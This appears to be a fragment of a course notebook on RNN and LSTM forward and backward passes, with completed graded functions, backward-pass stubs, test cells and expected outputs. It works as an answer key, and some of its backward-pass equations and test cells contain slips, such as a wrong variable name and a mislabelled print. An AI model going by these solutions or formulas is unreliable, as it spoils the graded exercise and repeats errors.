array of shape (n_a, n_a + n_x)\n bo -- Bias of the output gate, numpy array of shape (n_a, 1)\n Wy -- Weight matrix relating the hidden-state to the output, numpy array of shape (n_y, n_a)\n by -- Bias relating the hidden-state to the output, numpy array of shape (n_y, 1)\n \n Returns:\n a_next -- next hidden state, of shape (n_a, m)\n c_next -- next memory state, of shape (n_a, m)\n yt_pred -- prediction at timestep \"t\", numpy array of shape (n_y, m)\n cache -- tuple of values needed for the backward pass, contains (a_next, c_next, a_prev, c_prev, xt, parameters)\n \n Note: ft/it/ot stand for the forget/update/output gates, cct stands for the candidate value (c tilde),\n c stands for the memory value\n \"\"\"\n\n # Retrieve parameters from \"parameters\"\n Wf = parameters[\"Wf\"]\n bf = parameters[\"bf\"]\n Wi = parameters[\"Wi\"]\n bi = parameters[\"bi\"]\n Wc = parameters[\"Wc\"]\n bc = parameters[\"bc\"]\n Wo = parameters[\"Wo\"]\n bo = parameters[\"bo\"]\n Wy = parameters[\"Wy\"]\n by = parameters[\"by\"]\n \n # Retrieve dimensions from shapes of xt and Wy\n n_x, m = xt.shape\n n_y, n_a = Wy.shape\n\n ### START CODE HERE ###\n # Concatenate a_prev and xt (≈3 lines)\n concat = np.concatenate((a_prev, xt), axis=0)\n #concat[: n_a, :] = None\n #concat[n_a :, :] = None\n\n # Compute values for ft, it, cct, c_next, ot, a_next using the formulas given figure (4) (≈6 lines)\n ft = sigmoid( np.matmul( Wf, concat ) + bf )\n it = sigmoid( np.matmul( Wi, concat ) + bi )\n cct = np.tanh( np.matmul( Wc, concat ) + bc )\n c_next = ft*c_prev + it*cct\n ot = sigmoid( np.matmul( Wo, concat )+ bo )\n a_next = ot*np.tanh(c_next)\n \n # Compute prediction of the LSTM cell (≈1 line)\n yt_pred = softmax(np.matmul(Wy,a_next)+by)\n ### END CODE HERE ###\n\n # store values needed for backward propagation in cache\n cache = (a_next, c_next, a_prev, c_prev, ft, it, cct, ot, xt, parameters)\n\n return a_next, c_next, yt_pred, cache",
"_____no_output_____"
],
[
"np.random.seed(1)\nxt = np.random.randn(3,10)\na_prev = np.random.randn(5,10)\nc_prev = np.random.randn(5,10)\nWf = np.random.randn(5, 5+3)\nbf = np.random.randn(5,1)\nWi = np.random.randn(5, 5+3)\nbi = np.random.randn(5,1)\nWo = np.random.randn(5, 5+3)\nbo = np.random.randn(5,1)\nWc = np.random.randn(5, 5+3)\nbc = np.random.randn(5,1)\nWy = np.random.randn(2,5)\nby = np.random.randn(2,1)\n\nparameters = {\"Wf\": Wf, \"Wi\": Wi, \"Wo\": Wo, \"Wc\": Wc, \"Wy\": Wy, \"bf\": bf, \"bi\": bi, \"bo\": bo, \"bc\": bc, \"by\": by}\n\na_next, c_next, yt, cache = lstm_cell_forward(xt, a_prev, c_prev, parameters)\nprint(\"a_next[4] = \", a_next[4])\nprint(\"a_next.shape = \", c_next.shape)\nprint(\"c_next[2] = \", c_next[2])\nprint(\"c_next.shape = \", c_next.shape)\nprint(\"yt[1] =\", yt[1])\nprint(\"yt.shape = \", yt.shape)\nprint(\"cache[1][3] =\", cache[1][3])\nprint(\"len(cache) = \", len(cache))",
"a_next[4] = [-0.66408471 0.0036921 0.02088357 0.22834167 -0.85575339 0.00138482\n 0.76566531 0.34631421 -0.00215674 0.43827275]\na_next.shape = (5, 10)\nc_next[2] = [ 0.63267805 1.00570849 0.35504474 0.20690913 -1.64566718 0.11832942\n 0.76449811 -0.0981561 -0.74348425 -0.26810932]\nc_next.shape = (5, 10)\nyt[1] = [ 0.79913913 0.15986619 0.22412122 0.15606108 0.97057211 0.31146381\n 0.00943007 0.12666353 0.39380172 0.07828381]\nyt.shape = (2, 10)\ncache[1][3] = [-0.16263996 1.03729328 0.72938082 -0.54101719 0.02752074 -0.30821874\n 0.07651101 -1.03752894 1.41219977 -0.37647422]\nlen(cache) = 10\n"
]
],
[
[
"**Expected Output**:\n\n<table>\n <tr>\n <td>\n **a_next[4]**:\n </td>\n <td>\n [-0.66408471 0.0036921 0.02088357 0.22834167 -0.85575339 0.00138482\n 0.76566531 0.34631421 -0.00215674 0.43827275]\n </td>\n </tr>\n <tr>\n <td>\n **a_next.shape**:\n </td>\n <td>\n (5, 10)\n </td>\n </tr>\n <tr>\n <td>\n **c_next[2]**:\n </td>\n <td>\n [ 0.63267805 1.00570849 0.35504474 0.20690913 -1.64566718 0.11832942\n 0.76449811 -0.0981561 -0.74348425 -0.26810932]\n </td>\n </tr>\n <tr>\n <td>\n **c_next.shape**:\n </td>\n <td>\n (5, 10)\n </td>\n </tr>\n <tr>\n <td>\n **yt[1]**:\n </td>\n <td>\n [ 0.79913913 0.15986619 0.22412122 0.15606108 0.97057211 0.31146381\n 0.00943007 0.12666353 0.39380172 0.07828381]\n </td>\n </tr>\n <tr>\n <td>\n **yt.shape**:\n </td>\n <td>\n (2, 10)\n </td>\n </tr>\n <tr>\n <td>\n **cache[1][3]**:\n </td>\n <td>\n [-0.16263996 1.03729328 0.72938082 -0.54101719 0.02752074 -0.30821874\n 0.07651101 -1.03752894 1.41219977 -0.37647422]\n </td>\n </tr>\n <tr>\n <td>\n **len(cache)**:\n </td>\n <td>\n 10\n </td>\n </tr>\n\n</table>",
"_____no_output_____"
],
[
"### 2.2 - Forward pass for LSTM\n\nNow that you have implemented one step of an LSTM, you can now iterate this over this using a for-loop to process a sequence of $T_x$ inputs. \n\n<img src=\"images/LSTM_rnn.png\" style=\"width:500;height:300px;\">\n<caption><center> **Figure 5**: LSTM over multiple time-steps. </center></caption>\n\n**Exercise:** Implement `lstm_forward()` to run an LSTM over $T_x$ time-steps. \n\n**Note**: $c^{\\langle 0 \\rangle}$ is initialized with zeros.",
"_____no_output_____"
]
],
[
[
"# GRADED FUNCTION: lstm_forward\n\ndef lstm_forward(x, a0, parameters):\n \"\"\"\n Implement the forward propagation of the recurrent neural network using an LSTM-cell described in Figure (4).\n\n Arguments:\n x -- Input data for every time-step, of shape (n_x, m, T_x).\n a0 -- Initial hidden state, of shape (n_a, m)\n parameters -- python dictionary containing:\n Wf -- Weight matrix of the forget gate, numpy array of shape (n_a, n_a + n_x)\n bf -- Bias of the forget gate, numpy array of shape (n_a, 1)\n Wi -- Weight matrix of the update gate, numpy array of shape (n_a, n_a + n_x)\n bi -- Bias of the update gate, numpy array of shape (n_a, 1)\n Wc -- Weight matrix of the first \"tanh\", numpy array of shape (n_a, n_a + n_x)\n bc -- Bias of the first \"tanh\", numpy array of shape (n_a, 1)\n Wo -- Weight matrix of the output gate, numpy array of shape (n_a, n_a + n_x)\n bo -- Bias of the output gate, numpy array of shape (n_a, 1)\n Wy -- Weight matrix relating the hidden-state to the output, numpy array of shape (n_y, n_a)\n by -- Bias relating the hidden-state to the output, numpy array of shape (n_y, 1)\n \n Returns:\n a -- Hidden states for every time-step, numpy array of shape (n_a, m, T_x)\n y -- Predictions for every time-step, numpy array of shape (n_y, m, T_x)\n caches -- tuple of values needed for the backward pass, contains (list of all the caches, x)\n \"\"\"\n\n # Initialize \"caches\", which will track the list of all the caches\n caches = []\n \n ### START CODE HERE ###\n # Retrieve dimensions from shapes of x and parameters['Wy'] (≈2 lines)\n n_x, m, T_x = x.shape\n n_y, n_a = parameters['Wy'].shape\n \n # initialize \"a\", \"c\" and \"y\" with zeros (≈3 lines)\n a = np.zeros( (n_a,m,T_x), dtype=np.float )\n c = np.zeros( (n_a,m,T_x), dtype=np.float )\n y = np.zeros( (n_y,m,T_x), dtype=np.float )\n \n # Initialize a_next and c_next (≈2 lines)\n a_next = a0\n c_next = np.zeros_like(a_next)\n \n # loop over all time-steps\n for t in range(T_x):\n # Update next hidden state, next memory state, compute the prediction, get the cache (≈1 line)\n a_next, c_next, yt, cache = lstm_cell_forward(x[:,:,t], a_next, c_next, parameters)\n # Save the value of the new \"next\" hidden state in a (≈1 line)\n a[:,:,t] = a_next\n # Save the value of the prediction in y (≈1 line)\n y[:,:,t] = yt\n # Save the value of the next cell state (≈1 line)\n c[:,:,t] = c_next\n # Append the cache into caches (≈1 line)\n caches.append(cache)\n \n ### END CODE HERE ###\n \n # store values needed for backward propagation in cache\n caches = (caches, x)\n\n return a, y, c, caches",
"_____no_output_____"
],
[
"np.random.seed(1)\nx = np.random.randn(3,10,7)\na0 = np.random.randn(5,10)\nWf = np.random.randn(5, 5+3)\nbf = np.random.randn(5,1)\nWi = np.random.randn(5, 5+3)\nbi = np.random.randn(5,1)\nWo = np.random.randn(5, 5+3)\nbo = np.random.randn(5,1)\nWc = np.random.randn(5, 5+3)\nbc = np.random.randn(5,1)\nWy = np.random.randn(2,5)\nby = np.random.randn(2,1)\n\nparameters = {\"Wf\": Wf, \"Wi\": Wi, \"Wo\": Wo, \"Wc\": Wc, \"Wy\": Wy, \"bf\": bf, \"bi\": bi, \"bo\": bo, \"bc\": bc, \"by\": by}\n\na, y, c, caches = lstm_forward(x, a0, parameters)\nprint(\"a[4][3][6] = \", a[4][3][6])\nprint(\"a.shape = \", a.shape)\nprint(\"y[1][4][3] =\", y[1][4][3])\nprint(\"y.shape = \", y.shape)\nprint(\"caches[1][1[1]] =\", caches[1][1][1])\nprint(\"c[1][2][1]\", c[1][2][1])\nprint(\"len(caches) = \", len(caches))",
"a[4][3][6] = 0.172117767533\na.shape = (5, 10, 7)\ny[1][4][3] = 0.95087346185\ny.shape = (2, 10, 7)\ncaches[1][1[1]] = [ 0.82797464 0.23009474 0.76201118 -0.22232814 -0.20075807 0.18656139\n 0.41005165]\nc[1][2][1] -0.855544916718\nlen(caches) = 2\n"
]
],
[
[
"**Expected Output**:\n\n<table>\n <tr>\n <td>\n **a[4][3][6]** =\n </td>\n <td>\n 0.172117767533\n </td>\n </tr>\n <tr>\n <td>\n **a.shape** =\n </td>\n <td>\n (5, 10, 7)\n </td>\n </tr>\n <tr>\n <td>\n **y[1][4][3]** =\n </td>\n <td>\n 0.95087346185\n </td>\n </tr>\n <tr>\n <td>\n **y.shape** =\n </td>\n <td>\n (2, 10, 7)\n </td>\n </tr>\n <tr>\n <td>\n **caches[1][1][1]** =\n </td>\n <td>\n [ 0.82797464 0.23009474 0.76201118 -0.22232814 -0.20075807 0.18656139\n 0.41005165]\n </td>\n \n </tr>\n <tr>\n <td>\n **c[1][2][1]** =\n </td>\n <td>\n -0.855544916718\n </td>\n </tr> \n \n </tr>\n <tr>\n <td>\n **len(caches)** =\n </td>\n <td>\n 2\n </td>\n </tr>\n\n</table>",
"_____no_output_____"
],
[
"Congratulations! You have now implemented the forward passes for the basic RNN and the LSTM. When using a deep learning framework, implementing the forward pass is sufficient to build systems that achieve great performance. \n\nThe rest of this notebook is optional, and will not be graded.",
"_____no_output_____"
],
[
"## 3 - Backpropagation in recurrent neural networks (OPTIONAL / UNGRADED)\n\nIn modern deep learning frameworks, you only have to implement the forward pass, and the framework takes care of the backward pass, so most deep learning engineers do not need to bother with the details of the backward pass. If however you are an expert in calculus and want to see the details of backprop in RNNs, you can work through this optional portion of the notebook. \n\nWhen in an earlier course you implemented a simple (fully connected) neural network, you used backpropagation to compute the derivatives with respect to the cost to update the parameters. Similarly, in recurrent neural networks you can to calculate the derivatives with respect to the cost in order to update the parameters. The backprop equations are quite complicated and we did not derive them in lecture. However, we will briefly present them below. ",
"_____no_output_____"
],
[
"### 3.1 - Basic RNN backward pass\n\nWe will start by computing the backward pass for the basic RNN-cell.\n\n<img src=\"images/rnn_cell_backprop.png\" style=\"width:500;height:300px;\"> <br>\n<caption><center> **Figure 6**: RNN-cell's backward pass. Just like in a fully-connected neural network, the derivative of the cost function $J$ backpropagates through the RNN by following the chain-rule from calculus. The chain-rule is also used to calculate $(\\frac{\\partial J}{\\partial W_{ax}},\\frac{\\partial J}{\\partial W_{aa}},\\frac{\\partial J}{\\partial b})$ to update the parameters $(W_{ax}, W_{aa}, b_a)$. </center></caption>",
"_____no_output_____"
],
[
"#### Deriving the one step backward functions: \n\nTo compute the `rnn_cell_backward` you need to compute the following equations. It is a good exercise to derive them by hand. \n\nThe derivative of $\\tanh$ is $1-\\tanh(x)^2$. You can find the complete proof [here](https://www.wyzant.com/resources/lessons/math/calculus/derivative_proofs/tanx). Note that: $ \\text{sech}(x)^2 = 1 - \\tanh(x)^2$\n\nSimilarly for $\\frac{ \\partial a^{\\langle t \\rangle} } {\\partial W_{ax}}, \\frac{ \\partial a^{\\langle t \\rangle} } {\\partial W_{aa}}, \\frac{ \\partial a^{\\langle t \\rangle} } {\\partial b}$, the derivative of $\\tanh(u)$ is $(1-\\tanh(u)^2)du$. \n\nThe final two equations also follow same rule and are derived using the $\\tanh$ derivative. Note that the arrangement is done in a way to get the same dimensions to match.",
"_____no_output_____"
]
],
[
[
"def rnn_cell_backward(da_next, cache):\n \"\"\"\n Implements the backward pass for the RNN-cell (single time-step).\n\n Arguments:\n da_next -- Gradient of loss with respect to next hidden state\n cache -- python dictionary containing useful values (output of rnn_cell_forward())\n\n Returns:\n gradients -- python dictionary containing:\n dx -- Gradients of input data, of shape (n_x, m)\n da_prev -- Gradients of previous hidden state, of shape (n_a, m)\n dWax -- Gradients of input-to-hidden weights, of shape (n_a, n_x)\n dWaa -- Gradients of hidden-to-hidden weights, of shape (n_a, n_a)\n dba -- Gradients of bias vector, of shape (n_a, 1)\n \"\"\"\n \n # Retrieve values from cache\n (a_next, a_prev, xt, parameters) = cache\n \n # Retrieve values from parameters\n Wax = parameters[\"Wax\"]\n Waa = parameters[\"Waa\"]\n Wya = parameters[\"Wya\"]\n ba = parameters[\"ba\"]\n by = parameters[\"by\"]\n\n ### START CODE HERE ###\n # compute the gradient of tanh with respect to a_next (≈1 line)\n dtanh = None\n\n # compute the gradient of the loss with respect to Wax (≈2 lines)\n dxt = None\n dWax = None\n\n # compute the gradient with respect to Waa (≈2 lines)\n da_prev = None\n dWaa = None\n\n # compute the gradient with respect to b (≈1 line)\n dba = None\n\n ### END CODE HERE ###\n \n # Store the gradients in a python dictionary\n gradients = {\"dxt\": dxt, \"da_prev\": da_prev, \"dWax\": dWax, \"dWaa\": dWaa, \"dba\": dba}\n \n return gradients",
"_____no_output_____"
],
[
"np.random.seed(1)\nxt = np.random.randn(3,10)\na_prev = np.random.randn(5,10)\nWax = np.random.randn(5,3)\nWaa = np.random.randn(5,5)\nWya = np.random.randn(2,5)\nb = np.random.randn(5,1)\nby = np.random.randn(2,1)\nparameters = {\"Wax\": Wax, \"Waa\": Waa, \"Wya\": Wya, \"ba\": ba, \"by\": by}\n\na_next, yt, cache = rnn_cell_forward(xt, a_prev, parameters)\n\nda_next = np.random.randn(5,10)\ngradients = rnn_cell_backward(da_next, cache)\nprint(\"gradients[\\\"dxt\\\"][1][2] =\", gradients[\"dxt\"][1][2])\nprint(\"gradients[\\\"dxt\\\"].shape =\", gradients[\"dxt\"].shape)\nprint(\"gradients[\\\"da_prev\\\"][2][3] =\", gradients[\"da_prev\"][2][3])\nprint(\"gradients[\\\"da_prev\\\"].shape =\", gradients[\"da_prev\"].shape)\nprint(\"gradients[\\\"dWax\\\"][3][1] =\", gradients[\"dWax\"][3][1])\nprint(\"gradients[\\\"dWax\\\"].shape =\", gradients[\"dWax\"].shape)\nprint(\"gradients[\\\"dWaa\\\"][1][2] =\", gradients[\"dWaa\"][1][2])\nprint(\"gradients[\\\"dWaa\\\"].shape =\", gradients[\"dWaa\"].shape)\nprint(\"gradients[\\\"dba\\\"][4] =\", gradients[\"dba\"][4])\nprint(\"gradients[\\\"dba\\\"].shape =\", gradients[\"dba\"].shape)",
"_____no_output_____"
]
],
[
[
"**Expected Output**:\n\n<table>\n <tr>\n <td>\n **gradients[\"dxt\"][1][2]** =\n </td>\n <td>\n -0.460564103059\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dxt\"].shape** =\n </td>\n <td>\n (3, 10)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"da_prev\"][2][3]** =\n </td>\n <td>\n 0.0842968653807\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"da_prev\"].shape** =\n </td>\n <td>\n (5, 10)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWax\"][3][1]** =\n </td>\n <td>\n 0.393081873922\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWax\"].shape** =\n </td>\n <td>\n (5, 3)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWaa\"][1][2]** = \n </td>\n <td>\n -0.28483955787\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWaa\"].shape** =\n </td>\n <td>\n (5, 5)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dba\"][4]** = \n </td>\n <td>\n [ 0.80517166]\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dba\"].shape** = \n </td>\n <td>\n (5, 1)\n </td>\n </tr>\n</table>",
"_____no_output_____"
],
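[
"# Optional numerical check (not part of the graded assignment): for the scalar\n# loss L = sum(a_next * da_next), the backprop above gives dL/dba = gradients[\"dba\"].\n# A centered finite difference on one entry of ba should produce nearly the same number.\neps = 1e-6\ni = 2  # check a single entry of ba\nba_plus, ba_minus = np.copy(ba), np.copy(ba)\nba_plus[i, 0] += eps\nba_minus[i, 0] -= eps\na_plus, _, _ = rnn_cell_forward(xt, a_prev, dict(parameters, ba=ba_plus))\na_minus, _, _ = rnn_cell_forward(xt, a_prev, dict(parameters, ba=ba_minus))\napprox = np.sum((a_plus - a_minus) * da_next) / (2 * eps)\nprint(approx, gradients[\"dba\"][i, 0])  # the two values should nearly match",
"_____no_output_____"
],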
[
"#### Backward pass through the RNN\n\nComputing the gradients of the cost with respect to $a^{\\langle t \\rangle}$ at every time-step $t$ is useful because it is what helps the gradient backpropagate to the previous RNN-cell. To do so, you need to iterate through all the time steps starting at the end, and at each step, you increment the overall $db_a$, $dW_{aa}$, $dW_{ax}$ and you store $dx$.\n\n**Instructions**:\n\nImplement the `rnn_backward` function. Initialize the return variables with zeros first and then loop through all the time steps while calling the `rnn_cell_backward` at each time timestep, update the other variables accordingly.",
"_____no_output_____"
]
],
[
[
"def rnn_backward(da, caches):\n \"\"\"\n Implement the backward pass for a RNN over an entire sequence of input data.\n\n Arguments:\n da -- Upstream gradients of all hidden states, of shape (n_a, m, T_x)\n caches -- tuple containing information from the forward pass (rnn_forward)\n \n Returns:\n gradients -- python dictionary containing:\n dx -- Gradient w.r.t. the input data, numpy-array of shape (n_x, m, T_x)\n da0 -- Gradient w.r.t the initial hidden state, numpy-array of shape (n_a, m)\n dWax -- Gradient w.r.t the input's weight matrix, numpy-array of shape (n_a, n_x)\n dWaa -- Gradient w.r.t the hidden state's weight matrix, numpy-arrayof shape (n_a, n_a)\n dba -- Gradient w.r.t the bias, of shape (n_a, 1)\n \"\"\"\n \n ### START CODE HERE ###\n \n # Retrieve values from the first cache (t=1) of caches (≈2 lines)\n (caches, x) = None\n (a1, a0, x1, parameters) = None\n \n # Retrieve dimensions from da's and x1's shapes (≈2 lines)\n n_a, m, T_x = None\n n_x, m = None\n \n # initialize the gradients with the right sizes (≈6 lines)\n dx = None\n dWax = None\n dWaa = None\n dba = None\n da0 = None\n da_prevt = None\n \n # Loop through all the time steps\n for t in reversed(range(None)):\n # Compute gradients at time step t. Choose wisely the \"da_next\" and the \"cache\" to use in the backward propagation step. (≈1 line)\n gradients = None\n # Retrieve derivatives from gradients (≈ 1 line)\n dxt, da_prevt, dWaxt, dWaat, dbat = gradients[\"dxt\"], gradients[\"da_prev\"], gradients[\"dWax\"], gradients[\"dWaa\"], gradients[\"dba\"]\n # Increment global derivatives w.r.t parameters by adding their derivative at time-step t (≈4 lines)\n dx[:, :, t] = None\n dWax += None\n dWaa += None\n dba += None\n \n # Set da0 to the gradient of a which has been backpropagated through all time-steps (≈1 line) \n da0 = None\n ### END CODE HERE ###\n\n # Store the gradients in a python dictionary\n gradients = {\"dx\": dx, \"da0\": da0, \"dWax\": dWax, \"dWaa\": dWaa,\"dba\": dba}\n \n return gradients",
"_____no_output_____"
],
[
"np.random.seed(1)\nx = np.random.randn(3,10,4)\na0 = np.random.randn(5,10)\nWax = np.random.randn(5,3)\nWaa = np.random.randn(5,5)\nWya = np.random.randn(2,5)\nba = np.random.randn(5,1)\nby = np.random.randn(2,1)\nparameters = {\"Wax\": Wax, \"Waa\": Waa, \"Wya\": Wya, \"ba\": ba, \"by\": by}\na, y, caches = rnn_forward(x, a0, parameters)\nda = np.random.randn(5, 10, 4)\ngradients = rnn_backward(da, caches)\n\nprint(\"gradients[\\\"dx\\\"][1][2] =\", gradients[\"dx\"][1][2])\nprint(\"gradients[\\\"dx\\\"].shape =\", gradients[\"dx\"].shape)\nprint(\"gradients[\\\"da0\\\"][2][3] =\", gradients[\"da0\"][2][3])\nprint(\"gradients[\\\"da0\\\"].shape =\", gradients[\"da0\"].shape)\nprint(\"gradients[\\\"dWax\\\"][3][1] =\", gradients[\"dWax\"][3][1])\nprint(\"gradients[\\\"dWax\\\"].shape =\", gradients[\"dWax\"].shape)\nprint(\"gradients[\\\"dWaa\\\"][1][2] =\", gradients[\"dWaa\"][1][2])\nprint(\"gradients[\\\"dWaa\\\"].shape =\", gradients[\"dWaa\"].shape)\nprint(\"gradients[\\\"dba\\\"][4] =\", gradients[\"dba\"][4])\nprint(\"gradients[\\\"dba\\\"].shape =\", gradients[\"dba\"].shape)",
"_____no_output_____"
]
],
[
[
"**Expected Output**:\n\n<table>\n <tr>\n <td>\n **gradients[\"dx\"][1][2]** =\n </td>\n <td>\n [-2.07101689 -0.59255627 0.02466855 0.01483317]\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dx\"].shape** =\n </td>\n <td>\n (3, 10, 4)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"da0\"][2][3]** =\n </td>\n <td>\n -0.314942375127\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"da0\"].shape** =\n </td>\n <td>\n (5, 10)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWax\"][3][1]** =\n </td>\n <td>\n 11.2641044965\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWax\"].shape** =\n </td>\n <td>\n (5, 3)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWaa\"][1][2]** = \n </td>\n <td>\n 2.30333312658\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWaa\"].shape** =\n </td>\n <td>\n (5, 5)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dba\"][4]** = \n </td>\n <td>\n [-0.74747722]\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dba\"].shape** = \n </td>\n <td>\n (5, 1)\n </td>\n </tr>\n</table>",
"_____no_output_____"
],
[
"## 3.2 - LSTM backward pass",
"_____no_output_____"
],
[
"### 3.2.1 One Step backward\n\nThe LSTM backward pass is slighltly more complicated than the forward one. We have provided you with all the equations for the LSTM backward pass below. (If you enjoy calculus exercises feel free to try deriving these from scratch yourself.) \n\n### 3.2.2 gate derivatives\n\n$$d \\Gamma_o^{\\langle t \\rangle} = da_{next}*\\tanh(c_{next}) * \\Gamma_o^{\\langle t \\rangle}*(1-\\Gamma_o^{\\langle t \\rangle})\\tag{7}$$\n\n$$d\\tilde c^{\\langle t \\rangle} = dc_{next}*\\Gamma_u^{\\langle t \\rangle}+ \\Gamma_o^{\\langle t \\rangle} (1-\\tanh(c_{next})^2) * i_t * da_{next} * \\tilde c^{\\langle t \\rangle} * (1-\\tanh(\\tilde c)^2) \\tag{8}$$\n\n$$d\\Gamma_u^{\\langle t \\rangle} = dc_{next}*\\tilde c^{\\langle t \\rangle} + \\Gamma_o^{\\langle t \\rangle} (1-\\tanh(c_{next})^2) * \\tilde c^{\\langle t \\rangle} * da_{next}*\\Gamma_u^{\\langle t \\rangle}*(1-\\Gamma_u^{\\langle t \\rangle})\\tag{9}$$\n\n$$d\\Gamma_f^{\\langle t \\rangle} = dc_{next}*\\tilde c_{prev} + \\Gamma_o^{\\langle t \\rangle} (1-\\tanh(c_{next})^2) * c_{prev} * da_{next}*\\Gamma_f^{\\langle t \\rangle}*(1-\\Gamma_f^{\\langle t \\rangle})\\tag{10}$$\n\n### 3.2.3 parameter derivatives \n\n$$ dW_f = d\\Gamma_f^{\\langle t \\rangle} * \\begin{pmatrix} a_{prev} \\\\ x_t\\end{pmatrix}^T \\tag{11} $$\n$$ dW_u = d\\Gamma_u^{\\langle t \\rangle} * \\begin{pmatrix} a_{prev} \\\\ x_t\\end{pmatrix}^T \\tag{12} $$\n$$ dW_c = d\\tilde c^{\\langle t \\rangle} * \\begin{pmatrix} a_{prev} \\\\ x_t\\end{pmatrix}^T \\tag{13} $$\n$$ dW_o = d\\Gamma_o^{\\langle t \\rangle} * \\begin{pmatrix} a_{prev} \\\\ x_t\\end{pmatrix}^T \\tag{14}$$\n\nTo calculate $db_f, db_u, db_c, db_o$ you just need to sum across the horizontal (axis= 1) axis on $d\\Gamma_f^{\\langle t \\rangle}, d\\Gamma_u^{\\langle t \\rangle}, d\\tilde c^{\\langle t \\rangle}, d\\Gamma_o^{\\langle t \\rangle}$ respectively. Note that you should have the `keep_dims = True` option.\n\nFinally, you will compute the derivative with respect to the previous hidden state, previous memory state, and input.\n\n$$ da_{prev} = W_f^T*d\\Gamma_f^{\\langle t \\rangle} + W_u^T * d\\Gamma_u^{\\langle t \\rangle}+ W_c^T * d\\tilde c^{\\langle t \\rangle} + W_o^T * d\\Gamma_o^{\\langle t \\rangle} \\tag{15}$$\nHere, the weights for equations 13 are the first n_a, (i.e. $W_f = W_f[:n_a,:]$ etc...)\n\n$$ dc_{prev} = dc_{next}\\Gamma_f^{\\langle t \\rangle} + \\Gamma_o^{\\langle t \\rangle} * (1- \\tanh(c_{next})^2)*\\Gamma_f^{\\langle t \\rangle}*da_{next} \\tag{16}$$\n$$ dx^{\\langle t \\rangle} = W_f^T*d\\Gamma_f^{\\langle t \\rangle} + W_u^T * d\\Gamma_u^{\\langle t \\rangle}+ W_c^T * d\\tilde c_t + W_o^T * d\\Gamma_o^{\\langle t \\rangle}\\tag{17} $$\nwhere the weights for equation 15 are from n_a to the end, (i.e. $W_f = W_f[n_a:,:]$ etc...)\n\n**Exercise:** Implement `lstm_cell_backward` by implementing equations $7-17$ below. Good luck! :)",
"_____no_output_____"
]
],
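[
[
"*Editor's note (hedged):* two mechanical pieces of equations $(11)$-$(14)$ above are easy to get wrong in numpy -- stacking $(a_{prev}; x_t)$ before the outer product, and the `keepdims=True` bias reduction. The short, self-contained sketch below shows both on random placeholder arrays; all shapes are illustrative and it is not part of the graded functions.",
"_____no_output_____"
]
],
[
[
"# Hedged sketch: the stacking and bias-reduction mechanics of eqs (11)-(14).\nimport numpy as np\n\nnp.random.seed(2)\nn_a, n_x, m = 5, 3, 10\na_prev = np.random.randn(n_a, m)\nxt = np.random.randn(n_x, m)\ndft = np.random.randn(n_a, m)                    # stand-in for a gate derivative\n\nconcat = np.concatenate((a_prev, xt), axis=0)    # shape (n_a + n_x, m)\ndWf = dft @ concat.T                             # eq (11): shape (n_a, n_a + n_x)\ndbf = np.sum(dft, axis=1, keepdims=True)         # bias: shape (n_a, 1), not (n_a,)\n\nprint(concat.shape, dWf.shape, dbf.shape)",
"_____no_output_____"
]
],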
[
[
"def lstm_cell_backward(da_next, dc_next, cache):\n \"\"\"\n Implement the backward pass for the LSTM-cell (single time-step).\n\n Arguments:\n da_next -- Gradients of next hidden state, of shape (n_a, m)\n dc_next -- Gradients of next cell state, of shape (n_a, m)\n cache -- cache storing information from the forward pass\n\n Returns:\n gradients -- python dictionary containing:\n dxt -- Gradient of input data at time-step t, of shape (n_x, m)\n da_prev -- Gradient w.r.t. the previous hidden state, numpy array of shape (n_a, m)\n dc_prev -- Gradient w.r.t. the previous memory state, of shape (n_a, m, T_x)\n dWf -- Gradient w.r.t. the weight matrix of the forget gate, numpy array of shape (n_a, n_a + n_x)\n dWi -- Gradient w.r.t. the weight matrix of the update gate, numpy array of shape (n_a, n_a + n_x)\n dWc -- Gradient w.r.t. the weight matrix of the memory gate, numpy array of shape (n_a, n_a + n_x)\n dWo -- Gradient w.r.t. the weight matrix of the output gate, numpy array of shape (n_a, n_a + n_x)\n dbf -- Gradient w.r.t. biases of the forget gate, of shape (n_a, 1)\n dbi -- Gradient w.r.t. biases of the update gate, of shape (n_a, 1)\n dbc -- Gradient w.r.t. biases of the memory gate, of shape (n_a, 1)\n dbo -- Gradient w.r.t. biases of the output gate, of shape (n_a, 1)\n \"\"\"\n\n # Retrieve information from \"cache\"\n (a_next, c_next, a_prev, c_prev, ft, it, cct, ot, xt, parameters) = cache\n \n ### START CODE HERE ###\n # Retrieve dimensions from xt's and a_next's shape (≈2 lines)\n n_x, m = None\n n_a, m = None\n \n # Compute gates related derivatives, you can find their values can be found by looking carefully at equations (7) to (10) (≈4 lines)\n dot = None\n dcct = None\n dit = None\n dft = None\n \n # Code equations (7) to (10) (≈4 lines)\n dit = None\n dft = None\n dot = None\n dcct = None\n\n # Compute parameters related derivatives. Use equations (11)-(14) (≈8 lines)\n dWf = None\n dWi = None\n dWc = None\n dWo = None\n dbf = None\n dbi = None\n dbc = None\n dbo = None\n\n # Compute derivatives w.r.t previous hidden state, previous memory state and input. Use equations (15)-(17). (≈3 lines)\n da_prev = None\n dc_prev = None\n dxt = None\n ### END CODE HERE ###\n \n # Save gradients in dictionary\n gradients = {\"dxt\": dxt, \"da_prev\": da_prev, \"dc_prev\": dc_prev, \"dWf\": dWf,\"dbf\": dbf, \"dWi\": dWi,\"dbi\": dbi,\n \"dWc\": dWc,\"dbc\": dbc, \"dWo\": dWo,\"dbo\": dbo}\n\n return gradients",
"_____no_output_____"
],
[
